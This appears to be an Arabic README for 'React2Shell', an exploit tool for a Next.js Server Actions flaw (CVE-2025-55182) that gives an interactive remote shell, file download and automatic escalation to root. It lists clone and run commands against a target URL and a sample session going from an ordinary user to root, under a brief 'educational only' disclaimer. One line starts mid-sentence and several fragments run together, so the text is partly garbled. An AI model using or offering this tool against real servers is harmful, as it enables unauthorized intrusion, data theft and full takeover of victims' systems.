
مجموعة أدوات استغلال متقدمة لإجراءات خادم Next.js (CVE-2025-55182)
مجموعة أدوات استغلال متقدمة لـ Next.js Server Actions (CVE-2025-55182).
React2Shell هي أداة غلاف تفاعلية قوية مصممة لاستغلال ثغرة React2Shell. تتجاوز حدود RCE البسيطة من خلال توفير سجل للأوامر، وقدرات نقل الملفات، واستراتيجيات تصعيد صلاحيات آلية.
base64 | sudo -i) لتجاوز قيود الغلاف والتصعيد إلى الجذر فورًا..download <remote> [local]: تنزيل موثوق وآمن للملفات الثنائية باستخدام ترميز base64..save: حفظ مخرجات الأوامر في ملفات أدلة محلية.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
شغّل مع كشف استراتيجية بقاء صلاحيات الجذر المؤكدة:
python3 react2shell.py -u https://target.com/
بمجرد دخولك إلى الغلاف:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
لأغراض تعليمية فقط. هذه الأداة مخصصة لأبحاث الأمان والاختبارات المصرح بها فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. لا تفحص أو تستغل أهدافًا ليس لديك إذن صريح لاختبارها.
طُوّرت لاختبار الاختراق الأخلاقي وعمليات الفريق الأحمر.
| الأمر | الوصف |
|---|
.root | تبديل وضع الجذر (يلف الأوامر في sudo -i) |
.download <file> | تنزيل ملف من الخادم البعيد |
.save | حفظ مخرجات آخر أمر في ملف |
.exit | الخروج من الغلاف |